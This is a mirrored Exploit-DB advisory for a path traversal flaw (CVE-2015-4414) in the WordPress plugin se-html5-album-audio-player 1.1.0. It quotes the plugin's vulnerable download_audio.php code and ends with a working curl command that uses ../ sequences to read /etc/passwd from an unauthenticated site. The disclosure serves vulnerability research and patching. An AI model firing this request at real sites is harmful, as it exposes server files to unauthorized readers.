bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/37274.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

53 lines
No EOL
2.8 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
This vulnerability doesnt require authentication to the Wordpress site.
File ./se-html5-album-audio-player/download_audio.php:
3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8 // required for IE
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }
10
11 // get the file mime type using the file extension
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13 case 'pdf': $mime = 'application/pdf'; break;
14 case 'zip': $mime = 'application/zip'; break;
15 case 'jpeg':
16 case 'jpg': $mime = 'image/jpg'; break;
17 default: $mime = 'application/force-download';
18 }
19 header('Pragma: public'); // required
20 header('Expires: 0'); // no cache
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23 header('Cache-Control: private',false);
24 header('Content-Type: '.$mime);
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26 header('Content-Transfer-Encoding: binary');
27 header('Content-Length: '.filesize($file_name)); // provide file size
28 header('Connection: close');
29 readfile($file_name); // push it out
30 exit();
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Reference in a new issue View git blame Copy permalink